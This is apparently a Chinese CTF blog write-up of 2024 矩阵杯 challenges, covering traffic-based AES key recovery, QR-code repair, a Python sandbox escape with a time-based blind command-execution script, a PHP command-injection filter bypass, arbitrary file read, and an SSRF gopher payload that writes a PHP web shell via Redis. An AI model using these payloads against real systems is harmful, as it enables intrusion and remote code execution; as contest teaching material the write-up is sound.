矩阵杯 2024
本文最后更新于 70 天前,其中的信息可能已经有所发展或是发生改变。

Misc

真假补丁

  • 从流量中导出一个自解压程序,解压后得到补丁检测.exe补丁修复.exe,先传个云沙箱,没什么毒,虚拟机跑一下
  • 本想大致逆一下看看逻辑,发现是nuitka,反编译一大堆,不看了,先把程序跑起来,装个python3.8
  • 行,得是admin用户,不然路径不对,切换用户后然后再次运行
  • 补丁检测.exe就检测一下,和题没什么关系
  • 补丁修复.exe发现缺少requestspycryptodome,合理猜测加密了什么,访问了什么
  • 再次运行,好,不缺库了,缺文件
  • 算是正常运行了,只是请求不成功,再看流量包,发现POST /data.php,同时携带了一串值
d7DxBWeC1sSz5LY3colz2jpYCYgRdwfNFKcy1LIs/5RCocrzCD7bN9Do95e8AJvT+xp5YgHNrilph3JfBZenoUzY5saQYer85vqow1reJBsR4Kv2dDNdlXrUFe8blY7t
  • 结合配环境时装的两个包,结合题目名,合理构想这个程序的流程,读取admin桌面的密码,然后使用pycryptodome进行加密,最后requests发起请求;逻辑很清楚了,逆向不现实(对我来说,说不定逆向跌随便杀),那就misc一点儿,直接把加密过程截下来,盲猜是AES-CBC,修改安装的包源码
  • 跑一下试试,很成功啊,发现在AES加密前进行了base64,同时得到了keyiv,mode=2,即为CBC模式,浅拿一个一血
key: 324dd63a6365ca7729c8f85b6e479834
iv: ffe01db6b79092b8

两极反转

两极反转,黑白不分
奇变偶不变,横变竖不变
(PS:或许你要非常熟悉二维码的结构!
  • 字面意思,反转黑白,奇数行反偶数行不反,涉及定位符的行不翻
from PIL import Image
import pyzbar.pyzbar as pyzbar

image = "8E2A248B-0EE8-42b2-B19B-C6A9CE0D47F8.png"
img = Image.open(image)
img = img.convert("RGB")
img = img.resize((29,29),Image.NEAREST)
for j in range(8,20,2):
    for i in range(29):
        tmp = img.getpixel((i,j))
        if(tmp == (0,0,0)):
            img.putpixel((i,j),(255,255,255))
        else:
            img.putpixel((i,j),(0,0,0))
img = img.resize((726,726),Image.NEAREST)
img.show()
barcodes = pyzbar.decode(img)
print(barcodes)
for barcode in barcodes:
    barcodeDATA = barcode.data.decode("utf-8")
    print(barcodeDATA)

What_CAN_I_SAY

  • 空白爷的题,但是出大问题,builtins没删掉,各种非
safebuiltins_dict={x:y for x,y in dict(vars(__builtins__)).items() if x[0] not in "_-abcdefghijklmnopqrstuvwxyz"}
del __builtins__
try:exec(code,safebuiltins_dict,{})
except:pass
  • 没什么回显,但我就想RCE,打个盲注拿结果
from pwn import *
from time import time

p = '{}abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
a = b"__import__('os').popen('cat /home/ctf/flag*').read()"
a = f'eval(bytes({str(list(a)).replace(" ","")}))'
template = f"""
a = {a}
if a[&&] == chr($$):
    eval(bytes([101,118,97,108,40,34,95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,115,121,115,116,101,109,40,39,115,108,101,101,112,32,50,39,41,34,41]))
what.can.i.say
<EOF>
"""
context.log_level = 'error'
for index in range(1000):
    for i in p:
        s = template.replace("&&", str(index))
        s = s.replace("$$", str(ord(i)))
        r = remote("pwn-32a2755c56.challenge.xctf.org.cn", 9999, ssl=True)
        recv = r.recvuntil(b">>>").decode()
        r.sendline(s.encode())
        a = time()
        r.recvuntil(b"?")
        b = time()
        r.close()
        if b - a > 1:
            print(i,end="")
            break
  • 假设builtins被预期删掉了,从作者那偷个wp来,这个payload非常极限,就差两三个字符
先这样,在那样,然后就好了

try:what=1;what.can.i.say
except:
 try:().classImroIsubclassesIinitIglobalsIbuiltinsIsysItropmiIrunsboxIopenIevalI5f2e7b7d2f27
 except Exception as a:a=a.name;I=a[5];c,m,s,i,g,t,y,p,r,f,v,h=a.split(I);u,d,z,x,l,q=a.encode().fromhex(h).decode();n=u*2;p=p[::-1]
try:(z+I+d+n+c+n+d+n+m+n+d+y+x).format(I=[])
except Exception as e:o=e.obj[1]
try:(z+I+d+n+s+n+d+y+x).format(I=o)
except Exception as e:o=e.obj()[140]
try:(z+I+d+n+i+n+d+n+g+n+d+y+x).format(I=o)
except Exception as e:b=e.obj[n+t+n];y=b[n+p+n](y);r=b[v](q+b[f](r+l+u+r[:3]+u).read().split(q)[1]+q);y.stdout.write(r);y.stderr.write(r)
  • 主体思想是通过Exception.name获取字符串,通过str.format调用属性获取sys.stdout来达成输出flag的条件
  • 又学到了新姿势(隔了这么久应该可以发了吧( ̄︶ ̄)↗ 

Web

Easyweb

  • index.php
<?php
if (isset($_GET['id']) && floatval($_GET['id']) !== '1' && $_GET['id'] == 1) 
{
        echo 'welcome,admin';
        $_SESSION['admin'] = True;
} 
else 
{
    die('flag?');
}
?>
<?php
if ($_SESSION['admin']) 
{
if(isset($_POST['code']))
{
   if(preg_match("/(ls|c|a|t| |f|i|n|d')/", $_POST['code'])==1)
       echo 'no!';
   elseif(preg_match("/[@#%^&*()|\/?><']/",$_POST['code'])==1)
       echo 'no!';
else
       system($_POST['code']);
}
}
?>
  • /?id=1.0绕过第一段,l\s绕过匹配
  • 访问/718g

where

  • 提供了个任意文件读的接口/look?file=/app/app.py
from flask import Flask,Response, request
app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def index():
    return "flag被我藏起来了,/look一下file看看呢"
@app.route('/look', methods=['GET', 'POST'])
def readfile():
    if request.values.get('file'):
        file = request.values.get('file')
        f= open(file,encoding='utf-8')
        content=f.read() 
        f.close()
        if 'flag' in content:
            return  "打卡下班"+content
        else:
            return  "抓紧找,着急下班"+content
   
    return "找找看,我着急下班"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
  • 翻翻常见的目录,在/root/.bash_history得到flag

tantanta

  • file://任意文件读,aaaabbb.php
<?php
error_reporting(0);
// error_reporting(E_ALL & ~E_WARNING);
// highlight_file(__FILE__);
$url=$_POST['data'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
  • 读取/proc/net/tcp查看端口状态,6379 redis
  • gopher打redis写马
POST /aaabbb.php HTTP/1.1
Host: host
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ip:port/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 433

data=gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇